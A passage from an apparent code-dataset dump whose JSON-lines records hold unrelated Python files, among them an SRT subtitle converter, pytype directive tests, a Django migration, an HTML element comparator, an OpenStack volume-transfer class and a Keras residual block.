f:\n s = f.read()\n return s\n","sub_path":"csc280/coursework/1010/utils_hwk_1010.py","file_name":"utils_hwk_1010.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"623610935","text":"# written by deciMae, minorly edited by glumbaron\n\nimport re\nimport sys\nfrom dataclasses import dataclass\nfrom functools import reduce\nfrom pathlib import Path\nfrom typing import Union, Generator, List\n\n\n@dataclass\nclass SrtTimestamp:\n hour: int\n minute: int\n second: int\n millisecond: int\n\n def __repr__(self):\n return (\n f\"{self.hour:02}:{self.minute:02}:\"\n f\"{self.second:02},{self.millisecond:03}\"\n )\n\n\n@dataclass\nclass Section:\n start: SrtTimestamp\n end: SrtTimestamp\n sequence_number: int\n text: str\n\n @property\n def range(self):\n return f\"{self.start} --> {self.end}\"\n\n def __repr__(self):\n return str.join(\"\\n\", [str(self.sequence_number), self.range, self.text])\n\n\ndef parse_chunk(sequence_number: int, text: str, time_delta: int) -> Section:\n time = sequence_number * time_delta\n nexttime = (sequence_number + 1) * time_delta\n hour = time // 3600\n min = time // 60 % 60\n sec = int(time) % 60\n next_hour = nexttime // 3600\n next_min = nexttime // 60 % 60\n next_sec = int(nexttime) % 60\n\n return Section(\n SrtTimestamp(hour, min, sec, 0),\n SrtTimestamp(next_hour, next_min, next_sec, 0),\n sequence_number + 1,\n text,\n )\n\n\ndef split_by_score(text: str, base_width: int = 10, best_length: int = 80) -> List[str]:\n \"\"\"\n Split text by score.\n\n Written by Decimae. I have no idea how this works vOv.\n \"\"\"\n num_chars = len(text)\n scores = [[0, 0] for _ in range(num_chars + 3)]\n for i in reversed(range(num_chars - 2)):\n listmin = i + 1\n listmax = min(int(round(i + best_length + 3 * base_width)), num_chars - 1)\n ideal = i + best_length\n\n for j in range(listmin, min(listmax + 1, num_chars - 1)):\n if text[j] == text[j + 1] and text[j] == \"\\n\":\n listmax = j\n break\n\n scoreopts = [[k, 100] for k in range(listmin, listmax + 1)]\n\n def score(k, preference):\n return preference + ((k - ideal) / base_width) ** 2 + scores[k + 1][1]\n\n for k in range(listmin, listmax + 1):\n if text[k] in \"\\n.!\":\n scoreopts[k - listmin] = [k, score(k, 0.001)]\n elif text[k] in \",;:\":\n scoreopts[k - listmin] = [k, score(k, 1.001)]\n elif text[k] == \" \":\n scoreopts[k - listmin] = [k, score(k, 2.001)]\n\n scores[i] = min(scoreopts, key=lambda pair: pair[1])\n\n out = []\n start = 0\n while scores[start][0] != 0:\n end = scores[start][0] + 1\n chunk = text[start:end].strip()\n start = end\n\n out.append(chunk)\n return out\n\n\ndef convert(src_txt: str, time_delta: int = 5, split_type: str = \"linebreak\") -> str:\n \"\"\"\n Converts a pre-formatted text into valid SubRip Text (srt) file format.\n\n Args:\n src_txt: Source text to convert\n time_delta: Optional; Seconds each subtitle section should remain on\n screen. Defaults to 5 seconds.\n split_type: Optional; Defines what is considered a chunk of\n dialogue. 
Can be one of three options `linebreak`, `emptyline`, `score`.\n\n Returns:\n The converted SRT text.\n \"\"\"\n if split_type == \"linebreak\":\n chunks = (line for line in src_txt.splitlines() if line)\n elif split_type == \"emptyline\":\n chunks = re.split(r\"(?:\\r?\\n){2,}\", src_txt.strip())\n elif split_type == \"score\":\n chunks = split_by_score(src_txt)\n else:\n raise ValueError(f\"Undefined split type: {split_type}\")\n\n sections = (str(parse_chunk(i, text, time_delta)) for i, text in enumerate(chunks))\n\n return str.join(\"\\n\\n\", sections)\n\n\ndef convert_file(src_file: Union[str, Path], output_file: Union[str, Path], **kwargs):\n \"\"\"\n Converts a pre-formatted text file into valid SubRip Text (srt) file format.\n\n Args:\n src_file: Path to the input text document.\n output_file: Path to the converted srt file.\n kwargs: See `convert` for available conversion options.\n \"\"\"\n src_txt = Path(src_file).read_text()\n srt_txt = convert(src_txt, **kwargs)\n\n Path(output_file).write_text(srt_txt)\n","sub_path":"txt2srt/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28483974","text":"import pickle\nfrom numpy import *\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\nfrom math import factorial\n\ndef savitzky_golay(y, window_size, order, deriv=0, rate=1):\n order_range = range(order+1)\n half_window = (window_size -1) // 2\n b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)\n firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve( m[::-1], y, mode='valid')\n\nwith open(\"round_up_rewards.pkl\", 'rb') as fo: \n dict_data = pickle.load(fo, encoding='bytes')\n \nprint(len(dict_data[0]))\n\n\nsmooth_neighbor=1\nstart=len(dict_data[0])-500\nend=len(dict_data[0])\n#end=170000\n\ndict_data0 = savitzky_golay(np.array(dict_data[0][start:end]), smooth_neighbor, 3) \ndict_data1 = savitzky_golay(np.array(dict_data[1][start:end]), smooth_neighbor, 3) \ndict_data2 = savitzky_golay(np.array(dict_data[2][start:end]), smooth_neighbor, 3) \ndict_data3 = savitzky_golay(np.array(dict_data[3][start:end]), smooth_neighbor, 3) \n\n\n\nzz = range(0, end-start)\n\nax1 = plt.subplot(4, 2, 1)\nax2 = plt.subplot(4, 2, 2)\nax3 = plt.subplot(4, 2, 3)\nax4 = plt.subplot(4, 2, 4)\n\nfont2 = {'family': 'Times New Roman',\n 'weight': 'normal',\n 'size': 30,\n }\n\nplt.sca(ax1)\nplt.plot(zz, dict_data0, label='predator-0-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-0-reward',font2)\n\nplt.sca(ax2)\nplt.plot(zz, dict_data1, label='predator-1-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-1-reward',font2)\n\nplt.sca(ax3)\nplt.plot(zz, dict_data2, label='predator-2-reward', linewidth=1,\n color='r', marker='o', markerfacecolor='red', markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('predator-2-reward',font2)\n\nplt.sca(ax4)\nplt.plot(zz, dict_data3, label='prey-reward', linewidth=1,\n color='b', marker='o', markerfacecolor='blue', 
markersize=2)\nplt.xlabel('episodes',font2)\nplt.ylabel('prey-reward',font2)\nplt.show()\n","sub_path":"tools/y.py","file_name":"y.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635075495","text":"def answer(s):\n salutes = 0\n # while('>' in s or '<' in s):\n # print(s)\n # temp_s = [char for char in s]\n # # for i in range(len(s) - 1):\n # # if s[i] == '>' and s[i + 1] == '<':\n # # salutes += 2\n # spots = []\n # for i, char in enumerate(s):\n # if i == 0 and char == '<' or i == len(s) - 1 and char == '>':\n # pass\n # else:\n # if char == '>':\n # if s[i + 1] == '<':\n # salutes += 2\n # temp_s[i + 1] = '>'\n # spots.append(i + 1)\n # if char == '<':\n # temp_s[i - 1] = '<'\n # spots.append(i - 1)\n # for i in range(len(s)):\n # if i not in spots:\n # temp_s[i] = '-'\n # s = ''.join(temp_s)\n # return salutes\n for i, char in enumerate(s):\n if char == '>':\n for j, char2 in enumerate(s[i:len(s)]):\n if char2 == '<':\n salutes += 2\n return salutes\n\nif __name__ == '__main__':\n print(answer(\"<<>><\"))","sub_path":"salute.py","file_name":"salute.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263462813","text":"\"\"\"Tests for directors.py.\"\"\"\n\n\nfrom pytype import directors\nfrom pytype import errors\nimport unittest\n\n_TEST_FILENAME = \"my_file.py\"\n\n\nclass LineSetTest(unittest.TestCase):\n\n def test_basic_operation(self):\n lines = directors._LineSet()\n lines.add(7)\n self.assertNotIn(6, lines)\n self.assertIn(7, lines)\n self.assertNotIn(8, lines)\n self.assertNotIn(100, lines)\n lines.add(100, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(101, lines)\n\n def test_increasing_limit(self):\n lines = directors._LineSet()\n lines.add(100, open_ended=True)\n lines.add(200, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(200, lines)\n self.assertIn(201, lines)\n\n def test_decreasing_limit(self):\n lines = directors._LineSet()\n lines.add(200, open_ended=True)\n lines.add(100, open_ended=True)\n self.assertNotIn(99, lines)\n self.assertIn(100, lines)\n self.assertIn(200, lines)\n self.assertIn(201, lines)\n\n\nclass DirectorTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n # Invoking the _error_name decorator will register the name as a valid\n # error name.\n for name in [\"test-error\", \"test-other-error\"]:\n errors._error_name(name)\n\n def _create(self, src, disable=()):\n self._errorlog = errors.ErrorLog()\n self._director = directors.Director(src, self._errorlog, _TEST_FILENAME,\n disable)\n\n def _should_report(self, expected, lineno, error_name=\"test-error\",\n filename=_TEST_FILENAME):\n error = errors.Error.for_test(\n errors.SEVERITY_ERROR, \"message\", error_name, filename=filename,\n lineno=lineno)\n self.assertEquals(\n expected,\n self._director.should_report_error(error))\n\n def test_ignore_globally(self):\n self._create(\"\", [\"my-error\"])\n self._should_report(False, 42, error_name=\"my-error\")\n\n def test_ignore_one_line(self):\n self._create(\"\"\"\n # line 2\n x = 123 # type: ignore\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_ignore_until_end(self):\n self._create(\"\"\"\n # line 2\n # type: ignore\n # line 4\n \"\"\")\n self._should_report(True, 2)\n 
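# only line 3, which carries the inline ignore comment, should be suppressed\n 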
self._should_report(False, 3)\n self._should_report(False, 4)\n\n def test_out_of_scope(self):\n self._create(\"\"\"\n # type: ignore\n \"\"\")\n self._should_report(False, 2)\n self._should_report(True, 2, filename=None) # No file.\n self._should_report(True, 2, filename=\"some_other_file.py\") # Other file.\n self._should_report(True, None) # No line number.\n\n def test_disable(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_disable_until_end(self):\n self._create(\"\"\"\n # line 2\n # pytype: disable=test-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(False, 4)\n\n def test_disable_other_error(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-other-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(True, 3)\n self._should_report(False, 3, error_name=\"test-other-error\")\n self._should_report(True, 4)\n\n def test_disable_multiple_error(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=test-error,test-other-error\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(False, 3, error_name=\"test-other-error\")\n self._should_report(True, 4)\n\n def test_disable_all(self):\n self._create(\"\"\"\n # line 2\n x = 123 # pytype: disable=*\n # line 4\n \"\"\")\n self._should_report(True, 2)\n self._should_report(False, 3)\n self._should_report(True, 4)\n\n def test_invalid_disable(self):\n def check_warning(message_regex, text):\n self._create(text)\n self.assertLessEqual(1, len(self._errorlog))\n error = list(self._errorlog)[0]\n self.assertEquals(_TEST_FILENAME, error._filename)\n self.assertEquals(1, error.lineno)\n self.assertRegexpMatches(str(error), message_regex)\n\n check_warning(\"Unknown pytype directive.*disalbe.*\",\n \"# pytype: disalbe=test-error\")\n check_warning(\"Invalid error name.*bad-error-name.*\",\n \"# pytype: disable=bad-error-name\")\n check_warning(\"Invalid directive syntax\",\n \"# pytype: disable\")\n check_warning(\"Invalid directive syntax\",\n \"# pytype: \")\n check_warning(\"Unknown pytype directive.*foo.*\",\n \"# pytype: disable=test-error foo=bar\")\n # Spaces aren't allowed in the comma-separated value list.\n check_warning(\"Invalid directive syntax\",\n \"# pytype: disable=test-error ,test-other-error\")\n # This will actually result in two warnings: the first because the\n # empty string isn't a valid error name, the second because\n # test-other-error isn't a valid command. 
We only verify the first\n # warning.\n check_warning(\"Invalid error name\",\n \"# pytype: disable=test-error, test-other-error\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pytype/directors_test.py","file_name":"directors_test.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122218382","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Disciplina',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('nome', models.CharField(verbose_name='Nome', max_length=100)),\n ('ementa', models.TextField(verbose_name='Ementa')),\n ('cargaHoraria', models.CharField(verbose_name='Carga Horaria', max_length=20)),\n ('date_joined', models.DateTimeField(verbose_name='Data de Criação', auto_now_add=True)),\n ('date_up_joined', models.DateTimeField(auto_now=True, verbose_name='Data de Atualização: ')),\n ],\n options={\n 'ordering': ['nome'],\n 'verbose_name_plural': 'Disciplinas',\n 'verbose_name': 'Disciplina',\n },\n ),\n ]\n","sub_path":"eforum/disciplina/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15011520","text":"\"\"\"\nClasses to manage HTML file comparison, finding target elements, etc.\n\"\"\"\n\n\nclass HtmlElement:\n \"\"\"\n Representation of an HTML element. Includes methods to build the element's selector path.\n \"\"\"\n\n def __init__(self, soup_obj):\n self.soup_obj = soup_obj\n self.tag_attrs = self.soup_obj.attrs\n self.tag_attrs[\"value\"] = self.soup_obj.string if self.soup_obj.string else \"\"\n\n @staticmethod\n def get_node_element(node):\n \"\"\"\n\n :param node: a BeautifulSoup node.\n :return: selector component for the node, with :nth-child() when it has preceding siblings.\n \"\"\"\n length = len(list(node.previous_siblings)) + 1\n if length > 1:\n return f'{node.name}:nth-child({length})'\n else:\n return node.name\n\n def get_xpath(self):\n \"\"\"\n\n :return: a ' > '-joined CSS-style selector path from just below body down to this element.\n \"\"\"\n path = [self.get_node_element(self.soup_obj)]\n for parent in self.soup_obj.parents:\n if parent.name == 'body':\n break\n path.insert(0, self.get_node_element(parent))\n return ' > '.join(path)\n\n\nclass ElementComparator:\n \"\"\"\n This class is created for matching two 'HtmlElement' objects. Comparison methods are provided below.\n You can override them or add more methods with extra logic, such as Levenshtein distance; name them\n with a 'compare_' prefix if needed.\n \"\"\"\n\n # These tags can differ while the element stays the same. 
Additional logic can be implemented later\n    exclude_to_compare = [\"rel\", \"href\", \"onclick\"]\n\n    def __init__(self, original_element, inspected_element):\n        self.original_element = original_element\n        self.inspected_element = inspected_element\n        self.same_elements = []\n        self.compare_methods = [getattr(self, method) for method in dir(self) if\n                                method.startswith(\"compare_\") and callable(getattr(self, method))]\n\n    def compare(self):\n        \"\"\"\n        Main method for comparing elements\n        :return: the result of the comparison, True or False.\n        \"\"\"\n        original_elements_attrs = self.original_element.tag_attrs\n        inspected_element_attrs = self.inspected_element.tag_attrs\n        for og_tag_attr, og_tag_value in original_elements_attrs.items():\n            if og_tag_attr in self.exclude_to_compare:\n                continue\n            tar_tag_val = inspected_element_attrs.get(og_tag_attr, og_tag_value)\n            result = any([method(og_tag_value, tar_tag_val) for method in self.compare_methods])\n            self.same_elements.append(result)\n        return all(self.same_elements)\n\n    @staticmethod\n    def compare_exact_equal(og_value, target_value):\n        return og_value == target_value\n\n    @staticmethod\n    def compare_is_substring(og_value, target_value):\n        if og_value != target_value and target_value != \"\":\n            if isinstance(og_value, list) and isinstance(target_value, list):\n                return bool(set(og_value) & set(target_value))\n            return (og_value in target_value) or (target_value in og_value)\n","sub_path":"parser_classes.py","file_name":"parser_classes.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371046145","text":"import pymongo\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.pyplot as plt\n\n\ndef db2df(sku):\n    client = pymongo.MongoClient('localhost', 27017)\n    db = client.AMS\n    cursor = db[sku].find()\n    data = list(cursor)\n    df = pd.DataFrame(data)\n    df.drop('_id', axis=1, inplace=True)\n    df = df[(~df.title.str.contains('Inateck')) & (~df.title.str.contains('Tomons')) & (~df.title.str.contains('Tomtoc'))]\n    #df = df[(df.price>0) & (df.review>0) & (df.star>0)]\n    return df\n\n\ndef price_hist(df, bins_num):\n    price_max = df.price.max() * 1.1\n    price_min = df.price.min() * 0.8\n    df.price.hist(bins=bins_num)\n    plt.xlim((price_min, price_max))\n\n\ndef ams_asins(df, price_low, price_high):\n    df_required = df[(df.price > price_low) & (df.price < price_high)]\n    lst_required = list(df_required.asin)\n    asins = '|'.join(lst_required)\n    return asins\n","sub_path":"dev/first_app/ams_planning.py","file_name":"ams_planning.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477332945","text":"import numpy, os, datetime\nfrom ..extras import ops\nfrom default import ARMCLASS\n\nclass SOUNDING(ARMCLASS):\n    \"\"\" Defines a SOUNDING class\n    \n    This particular class defines a sounding. 
It uses as input a netcdf file\n    that has been detected as a sounding.\n    \n    \"\"\"\n    \n    def plot(self, altmax=10000, kind='simple', \n            plot_output=False,\n            out_dir = '',\n            out_name = '',\n            out_fmt = 'png',\n            autoname = True):\n        ''' \n        plot a sounding for quick visualization\n        \n        you can set altmax (in meters) and, with plot_output=True, save the\n        figure via out_dir, out_name, out_fmt and autoname.\n        currently `kind` doesn't work, but will eventually support choosing\n        between a normal height/temp plot and a skew-t\n        \n        example:\n            S.plot(altmax=3000, plot_output=True, autoname=False, out_name='sample_out.png')\n        \n        supported output types:\n            anything that matplotlib can normally output, such as png, eps, pdf\n        '''\n        \n        import matplotlib.pyplot as plt\n        \n        # create a mask for the altitude data\n        altmask = self.data['alt'] < altmax\n        \n        # set up the plot\n        f = plt.figure(); plt.clf()\n        \n        # create axes for the temperature and dewpoint plot\n        ax = f.add_subplot(121) \n        if kind == 'simple':\n            ax.plot(self.data['tdry'][altmask], \n                    self.data['alt'][altmask], \n                    'b-', label='Temp')\n            ax.plot(self.data['dp'][altmask], \n                    self.data['alt'][altmask], \n                    'r-', label='Dewpoint')\n        ax.legend(fontsize='x-small')\n        ax.set_ylim(top=altmax)\n        ax.grid('on')\n        \n        ax.set_xlabel('Temperature (C)')\n        ax.set_ylabel('Altitude (m)')\n        plt.suptitle(self.file_datetime.strftime(\n                    'Sounding beginning %B %d %Y %H:%M'))\n        \n        # create axes for the RH plot\n        ax = f.add_subplot(122)\n        ax.plot(self.data['rh'][altmask], \n                self.data['alt'][altmask], \n                'k-', label='RelH')\n        ax.legend(fontsize='x-small')\n        ax.grid('on')\n        ax.set_yticklabels('')\n        ax.set_xlabel('RH (%)')\n        \n        #plt.show()\n        if plot_output:\n            if autoname:\n                out_str = 'sounding_%Y-%m-%dH%H.' + out_fmt\n                out_name = self.file_datetime.strftime(out_str)  \n            plt.savefig(out_dir + out_name)\n        \n        #plt.close(f)","sub_path":"pyadapt/datastreams/sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"151637199","text":"import os\n\nfrom quicktions import Fraction\n\nfrom musicscore.basic_functions import dToX\nfrom musicscore.musicstream.streamvoice import SimpleFormat\nfrom musicscore.musictree.treescoretimewise import TreeScoreTimewise\nfrom musicxmlunittest import XMLTestCase\n\npath = os.path.abspath(__file__).split('.')[0]\n\n\ndef _generate_simple_format():\n    unit = Fraction(1, 2)\n    quarter_durations = [x * unit for x in range(1, 8)]\n    intervals = list(range(1, 7))\n    midis = dToX(intervals, first_element=60)\n    output = SimpleFormat(quarter_durations=quarter_durations, midis=midis)\n    return output\n\n\nclass Test(XMLTestCase):\n    def setUp(self) -> None:\n        self.score = TreeScoreTimewise()\n        self.sf = _generate_simple_format()\n\n    def test_1(self):\n        xml_path = path + '_test_1.xml'\n        self.sf.to_stream_voice().add_to_score(self.score)\n\n        def _change_quarter_duration(chord, factor):\n            chord.quarter_duration *= factor\n\n        self.sf.change_chords(lambda chord: _change_quarter_duration(chord, 2))\n        self.sf.to_stream_voice().add_to_score(self.score, staff_number=2)\n        self.score.write(xml_path)\n        self.assertCompareFiles(xml_path)\n\n    def test_2(self):\n        xml_path = path + '_test_2.xml'\n        self.sf.to_stream_voice().add_to_score(self.score)\n\n        def _change_quarter_duration(chord, factor):\n            chord.quarter_duration *= factor\n\n        self.sf.change_chords(lambda chord: _change_quarter_duration(chord, 2) if int(\n            chord.quarter_duration) != chord.quarter_duration else None)\n        self.sf.to_stream_voice().add_to_score(self.score, staff_number=2)\n        
self.score.write(xml_path)\n        self.assertCompareFiles(xml_path)\n","sub_path":"tests/musicstream/simpleformat/test_change_chords.py","file_name":"test_change_chords.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"394482879","text":"# Copyright (c) 2014 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the License);\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an AS IS BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n__author__ = 'mirrorcoder'\n\n\nclass VolumeTransfer(object):\n    \"\"\" The main class for gathering volume information for migrationlib\"\"\"\n    def __init__(self, volume, instance, image_id, glance_client, obj=None):\n        self.id = volume.id if not obj else obj['id']\n        self.size = volume.size if not obj else obj['size']\n        self.name = volume.display_name if not obj else obj['name']\n        self.description = volume.display_description if not obj else obj['description']\n        self.volume_type = (None if volume.volume_type == u'None' else volume.volume_type) \\\n            if not obj else obj['volume_type']\n        self.availability_zone = volume.availability_zone if not obj else obj['availability_zone']\n        self.device = volume.attachments[0]['device'] if not obj else obj['device']\n        self.host = getattr(instance, 'OS-EXT-SRV-ATTR:host') if not obj else obj['host']\n        self.image_id = image_id if not obj else obj['image_id'] \n        self.glance_client = glance_client\n        if hasattr(volume, 'bootable'):\n            self.bootable = (True if volume.bootable == 'true' else False)\n        else:\n            self.bootable = False\n        self.bootable = self.bootable if not obj else obj['bootable']\n\nclass VolumeTransferDirectly(VolumeTransfer):\n    def __init__(self, volume, instance, volume_path):\n        # parent also expects image_id and glance_client; a direct transfer has neither\n        super(VolumeTransferDirectly, self).__init__(volume, instance, None, None)\n        self.volume_path = volume_path\n\n    def get_volume_path(self):\n        return self.volume_path\n\nclass VolumeTransferViaImage(VolumeTransfer):\n\n    def __init__(self, volume, instance, image_id, glance_client):\n        super(VolumeTransferViaImage, self).__init__(volume, instance, image_id, glance_client)\n        self.glance_client = glance_client\n        self.image_id = image_id\n        self.__info = self.glance_client.images.get(self.image_id)\n        self.checksum = self.__info.checksum\n\n    def get_info_image(self):\n        return self.__info\n\n    def get_ref_image(self):\n        \"\"\"\n        return a file-like object which will be used on the destination cloud for importing images (aka volumes)\n        \"\"\"\n        resp = self.glance_client.images.data(self.image_id)._resp\n        return resp\n\n    def delete(self):\n        self.glance_client.images.delete(self.image_id)\n\n    def convert_to_dict(self):\n        return {\n            '_type_class': VolumeTransfer.__name__,\n            'id': self.id,\n            'size': self.size,\n            'name': self.name,\n            'description': self.description,\n            'volume_type': self.volume_type,\n            'availability_zone': self.availability_zone,\n            'device': self.device,\n            'host': self.host,\n            'image_id': self.image_id,\n            'bootable': self.bootable\n        
}","sub_path":"migrationlib/os/utils/osVolumeTransfer.py","file_name":"osVolumeTransfer.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"83017812","text":"from peewee import CharField, IntegerField, PrimaryKeyField\n\nfrom vegadns.api.models import database, BaseModel\nimport vegadns.api.models.recordtypes\n\n\nclass DefaultRecord(BaseModel):\n default_type = CharField()\n distance = IntegerField(null=True)\n group_owner_id = IntegerField(db_column='group_owner_id', null=True)\n host = CharField()\n port = IntegerField(null=True)\n record_id = PrimaryKeyField(db_column='record_id')\n ttl = IntegerField()\n type = CharField(null=True)\n val = CharField(null=True)\n weight = IntegerField(null=True)\n\n def to_recordtype(self):\n instance = vegadns.api.models.recordtypes.AbstractRecordType.singleton(\n self\n )\n instance.from_model(self)\n return instance\n\n class Meta:\n db_table = 'default_records'\n\n def validate(self):\n recordtype = self.to_recordtype()\n recordtype.validate(default_record=True)\n","sub_path":"vegadns/api/models/default_record.py","file_name":"default_record.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"600027657","text":"import os, pdb, gc\nimport numpy as np\nimport pandas as pd\nfrom Configs import _C as cfg\n\n\ndef make_click_with_ad():\n \"\"\" 拼接点击日志和广告属性,\n 并存储本地, 暂时过滤了测试集的非登入 creative_id 的日志记录\n \"\"\"\n\n save_dir = cfg.features + \"click_all.pkl\"\n if os.path.exists(save_dir):\n print(\"已经存在 click_all.pkl, 直接读取`{}`\\n\".format(save_dir))\n click_all = pd.read_pickle(save_dir)\n return click_all\n\n click_train = pd.read_csv(cfg.train_dir + \"click_log.csv\")\n click_test = pd.read_csv(cfg.test_dir + \"click_log.csv\")\n \n click_train['creative_id']=click_train['creative_id'].astype('int64')\n click_test['creative_id']=click_test['creative_id'].astype('int64')\n\n print(\"过滤测试集未登入训练集 creative_id 记录\\n\")\n click_test = click_test.loc[click_test['creative_id'].isin(click_train['creative_id'].unique())]\n\n ad_train = pd.read_csv(cfg.train_dir + \"ad.csv\")\n ad_train['creative_id'] = ad_train['creative_id'].astype('int64')\n click_log = click_train.merge(ad_train, how=\"left\", on=\"creative_id\")\n # click_log = click_log.sort_values([\"time\"]).reset_index(drop=True)\n click_log[\"type\"] = \"train\"\n\n ad_test = pd.read_csv(cfg.test_dir + \"ad.csv\")\n ad_test['creative_id'] = ad_test['creative_id'].astype('int64')\n click_log_test = click_test.merge(ad_test, how=\"left\", on=\"creative_id\")\n # click_log_test = click_log_test.sort_values([\"time\"]).reset_index(drop=True)\n click_log_test['type'] = \"test\"\n\n click_all = click_log.append(click_log_test)\n click_all.to_pickle(save_dir)\n\n return click_all\n","sub_path":"src/processing/click.py","file_name":"click.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"464372194","text":"import threading\nimport time\n\nrunning = 1\n\nclass MyThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.var = 0\n\n def run(self):\n while(running):\n self.var = self.var +1\n time.sleep(1) \n self.var = self.var +1 # Pretend to work for a second\n\n # Four times...\nmythread = MyThread() # ...Instantiate a thread and pass a unique ID to it\nmythread.start() # ...Start the 
thread\n\n\n# for i in range(10):\n# print(mythread.var)\n# time.sleep(0.5)\n\n# running = 0","sub_path":"Instruments/Lightfield/Python/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"537220042","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 19 14:39:51 2021\n\n@author: COMPREDICT\n\"\"\"\n\n# +\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.keras.layers import Dropout, Layer\nfrom tensorflow.keras.layers import Conv1D, TimeDistributed, Dense\nimport tensorflow as tf\n\nfrom tensorflow import nn\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.keras import constraints\nfrom tensorflow.python.keras import initializers\nfrom tensorflow.python.keras import regularizers\nfrom tensorflow.python.keras.engine.input_spec import InputSpec\n\n\nfrom tensorflow.python.keras.utils import conv_utils\nfrom tensorflow.python.keras.utils import tf_utils\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.util.tf_export import keras_export\n\n\nclass residual_block(Layer):\n \"\"\" Residual Block consisting of:\n DepthwiseConv1D->Dropout->DepthwiseConv1D->Dropout->Residual Connection\n Dilation is constant within residual block.\n\n Input shape:\n 3D Tensor with shape:\n [batch, Tx, n features]\n Output shape:\n 3D Tensor with shape:\n [batch, Tx, n features*depth_multiplier]\n \"\"\"\n def __init__(self, depthwise_kernel_size, dilation_rate=1,\n padding=\"causal\", activation=tf.keras.activations.swish,\n dropout=0.2, depth_multiplier=1,\n depthwise_initializer=tf.keras.initializers.HeUniform(),\n **kwargs):\n super(residual_block, self).__init__()\n self.dropout = Dropout(dropout)\n self.conv1 = DepthwiseConv1D(\n depthwise_kernel_size,\n dilation_rate=dilation_rate,\n name='depthwiseConv1D_dilation_{}_0'.format(dilation_rate),\n padding=padding, activation=activation,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=depthwise_initializer)\n self.conv2 = DepthwiseConv1D(\n depthwise_kernel_size,\n dilation_rate=dilation_rate,\n 